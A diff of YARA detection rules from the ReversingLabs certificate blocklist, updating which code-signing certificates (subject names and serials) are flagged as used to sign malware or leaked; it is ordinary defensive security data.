-rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_02F17566Ef568Dc06C9A379Ea2F4Faea : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "2be3a0d2-2c6a-5c66-856a-d3a70a490ba3"
+		id = "a14e16ff-844c-53ff-9297-8760265da747"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9366-L9382"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "52027548e20c819e73ea5e9afd87faaca4498bc39e54dd30ad99a24e3ace57fd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2284-L2300"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e3ec8a6de817354862880301e78a999f45f02c2fa8512bba6d27c9776f1a3417"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12127,21 +36792,21 @@ rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE4\\xB8\\x9C\\xE6\\xB9\\x96\\xE6\\x96\\xB0\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE5\\xBC\\x80\\xE5\\x8F\\x91\\xE5\\x8C\\xBA" and pe.signatures [ i ] . serial == "01:08:cb:ae:e6:07:28:f5:bf:06:e4:5a:56:d6:f1:70" and 1605680260 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALERIANO BEDESCHI" and pe.signatures [ i ] . serial == "02:f1:75:66:ef:56:8d:c0:6c:9a:37:9e:a2:f4:fa:ea" and 1441324799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D824Ba1F7F730319C50D64C9A7Ed507 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "48162554-a95b-5cd3-9bbb-bcf6a1d96592"
+		id = "4372aea7-a25b-5211-befd-9e0bcfb09199"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9384-L9400"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ed3a81231f93f9d2ae462481503ba37072c3800dd1379baae11737f093a27af1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2302-L2318"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "407611603974c910d9a6a0ed71ecdf54ddcc59abb0f48c60846e61d6d4191933"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12151,21 +36816,21 @@ rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE5\\x86\\x85\\xE7\\x91\\x9F\\xE6\\x96\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:8d:56:a1:21:53:e8:b5:c7:4c:69:bf:f6:5c:be:3f" and 1605680260 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "joaweb" and pe.signatures [ i ] . serial == "7d:82:4b:a1:f7:f7:30:31:9c:50:d6:4c:9a:7e:d5:07" and 1238025599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_77A64759F12766E363D779998C71Bdc9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac5d29ef-fd52-536b-bcbc-44433dda8a21"
+		id = "98acd01b-c452-530d-8814-2591810ecd53"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9402-L9418"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "49000f3a3ce1ad9aef87162d7527b8f062e0aa12276b82c7335f0ccc14b7d38a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2320-L2336"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2bf3d99ddec6b76da1ca60a9285767a5b34b84455db58195fc5d8fd8a22c9f8a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12175,21 +36840,21 @@ rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "06:0d:94:e2:cc:ae:84:53:66:54:d9:da:f3:9f:ef:1e" and 1627948800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Gigabit Times Technology Co., Ltd" and pe.signatures [ i ] . serial == "77:a6:47:59:f1:27:66:e3:63:d7:79:99:8c:71:bd:c9" and 1301011199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B0D17Ec1449B4B2D38Fcb0F20Fbcd3A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "614f88ca-183a-548b-99f1-30cf4c4027ce"
+		id = "4484b00d-8fad-5f8f-9030-67216f2820a3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9420-L9436"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6a498fd30c611976e9aad2f9b85b13c3c29246582cdfefc800615db88e40dac2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2338-L2354"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3121f2c49d0d4c396023924521f2c980045b6f07d082e49447429e9cd640e0ef"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12199,21 +36864,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" and 1629158400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WEBPIC DESENVOLVIMENTO DE SOFTWARE LTDA" and pe.signatures [ i ] . serial == "0b:0d:17:ec:14:49:b4:b2:d3:8f:cb:0f:20:fb:cd:3a" and 1394150399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fe9404Dc73Cf1C2Ba1450B8398305557 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "34594a57-f9fd-5b9d-afb6-691be33da9b5"
+		id = "17700719-81ea-58d4-87f5-4d5c1b19bf64"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9438-L9454"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d3ce83fb0497c533a5474d46300c341677ec243686723783798bfbaec4f6e369"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2356-L2374"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c0132d71de1384f6e534dd154eba88c4a51c43b7dfe984f3064ba4feffa4dd5a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12223,21 +36888,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xA6\\x8F\\xE5\\xBB\\xBA\\xE7\\x9C\\x81\\xE4\\xBA\\x94\\xE6\\x98\\x9F\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:43:24:ff:41:f0:a7:b1:6f:fc:c9:3d:ff:a8:fa:99" and 1600300800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8E\\xA6\\xE9\\x97\\xA8\\xE7\\xBF\\x94\\xE9\\x80\\x9A\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE5\\x88\\x86\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" or pe.signatures [ i ] . serial == "fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" ) and 1287360000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Cb2D523A6Bf7A066642C578De1C9Be4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7358f71-421f-57fa-abdf-ab479f4b7007"
+		id = "d2c87c29-cb64-5d43-847b-64c888421c1f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9456-L9472"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b0f43caec1cfc5b2d1512d7fcf0bcf1e02fc81764b4376b081f38c4de328eab2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2376-L2392"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5a786b9ade5a59b8a1e0bbef1eb3dcb65404dcee19d572dc60f9ec9f45e4755b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12247,21 +36912,21 @@ rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Idris Kanchwala Holding Corp." and pe.signatures [ i ] . serial == "0b:98:0f:c8:78:3e:4f:15:8e:41:82:9a:b2:1b:ab:81" and 1631750400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Hua\\xE2\\x80\\x99nan Xingfa Electronic Equipment Firm" and pe.signatures [ i ] . serial == "1c:b2:d5:23:a6:bf:7a:06:66:42:c5:78:de:1c:9b:e4" and 1400889599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3A6Ccabb1C62F3Be3Eb03869Fa43Dc4A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50ffd0a0-d861-53d7-a7dc-f74ccc49eff8"
+		id = "b16f7bb7-88fe-5f8f-9592-8d309f556419"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9474-L9492"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c7d57a655f76a6e5ef6b0e770db7c91d0830b6b0b37caef5ef9e3e78ad1fd75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2394-L2410"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ccb603c8a5f4fb63876e78d763f80a97098c23aa10673c7b04a48026268f57d3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12271,21 +36936,21 @@ rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLDING LA LTD" and ( pe.signatures [ i ] . serial == "00:d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" or pe.signatures [ i ] . serial == "d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" ) and 1619136000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB8\\xB8\\xE5\\xB7\\x9E\\xE9\\xAA\\x8F\\xE6\\x99\\xAF\\xE9\\x80\\x9A\\xE8\\x81\\x94\\xE6\\x95\\xB0\\xE5\\xAD\\x97\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "3a:6c:ca:bb:1c:62:f3:be:3e:b0:38:69:fa:43:dc:4a" and 1259798399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_864196F01971Dbec7002B48642A7013A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ed427336-6833-5e09-8ebe-039c8cd50846"
+		id = "80478430-ce01-5fae-bcaf-2b7a445bc20d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9494-L9512"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6d6db87227d7be559afa67c4f2b65b01f26741fdf337d920241a633bb036426f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2412-L2430"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a3173bb08e673caaa64ab22854840a135e891044b165bbc67733c951ec6aa991"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12295,21 +36960,21 @@ rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAN MARINO INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" or pe.signatures [ i ] . serial == "d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" ) and 1631059200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WLE DESENVOLVIMENTO DE SOFTWARE E ASSESSORIA LTDA EPP" and ( pe.signatures [ i ] . serial == "00:86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" or pe.signatures [ i ] . serial == "86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" ) and 1384300799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fda1E121B61Adeca936A6Aebe079303 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f319592a-5f08-5f2c-b840-5f897695e054"
+		id = "fba98d6b-dc09-5294-ad86-2f4e0d8ad320"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9514-L9532"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c74512e95e2d6aedecb1dbd30fac6fde40d1e9520c89b785519694d9bc9ba854"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2432-L2448"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "70a04c83e79c98024bacf1688bb46d80c9b8491e25dd32d6d92bf3cf61c62e48"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12319,21 +36984,21 @@ rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AmiraCo Oy" and ( pe.signatures [ i ] . serial == "00:96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" or pe.signatures [ i ] . serial == "96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" ) and 1615248000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Laizhou wanlei stone Co., LTD" and pe.signatures [ i ] . serial == "4f:da:1e:12:1b:61:ad:ec:a9:36:a6:ae:be:07:93:03" and 1310687999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03866Deb183Abfbf4Ff458D4De7Bd73A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "123e5aed-0ef4-5146-81bb-5d455a9cf92e"
+		id = "2641eb86-94f0-537c-a82a-6a5e1596ee84"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9534-L9550"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f6b454a575ea7635d5edebffe3c9c83e95312ee33245e733987532348258733e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2450-L2466"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "90d09d0d2d01500e0670277d0e8de574feecf7443cf4d077912b1166a9c14c43"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12343,21 +37008,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" and 1618531200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE8\\xAF\\x9D\\xE8\\xAF\\xAD\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:86:6d:eb:18:3a:bf:bf:4f:f4:58:d4:de:7b:d7:3a" and 1371772799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Be41B34127Ca9E6270830D2070Db426 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "959b10fe-fbd0-5642-a5d9-4ac2e0474666"
+		id = "bee69e9d-db8e-5d4e-8e97-b3791b4f717d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9552-L9570"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ea30d85c057f9363ce29d4c024097c50a8752dd2095481181322fe5d5c92bb4b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2468-L2484"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b66c4b9264be70d53838442a3112c4bacbdf2dda90840d71c3eb949e630b3f17"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12367,21 +37032,21 @@ rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIDDRA INTERNATIONAL CORP." and ( pe.signatures [ i ] . serial == "00:a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" or pe.signatures [ i ] . serial == "a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" ) and 1618963200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE8\\x80\\x98\\xE5\\x8D\\x87\\xE5\\xA4\\xA9\\xE4\\xB8\\x8B\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1b:e4:1b:34:12:7c:a9:e6:27:08:30:d2:07:0d:b4:26" and 1352764799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9B108B8A1Daa0D5581F59Fcee0447901 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4dbe7db7-2f61-558c-a6dc-875ba87322c7"
+		id = "cacb2af8-dbc6-5d61-a2d5-641c5c09bc79"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9572-L9590"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7e90c29bcfe4632e70b61a0cf2ab48a3de986bd5c6c730f64a363f4f3d79a3f4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2486-L2504"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "696e3da511f74f9cfb10b96130a36ae9f48c22f1e0deb76092db1262980ab3ac"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12391,21 +37056,21 @@ rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE
 		importance = 25
 
 	condition:
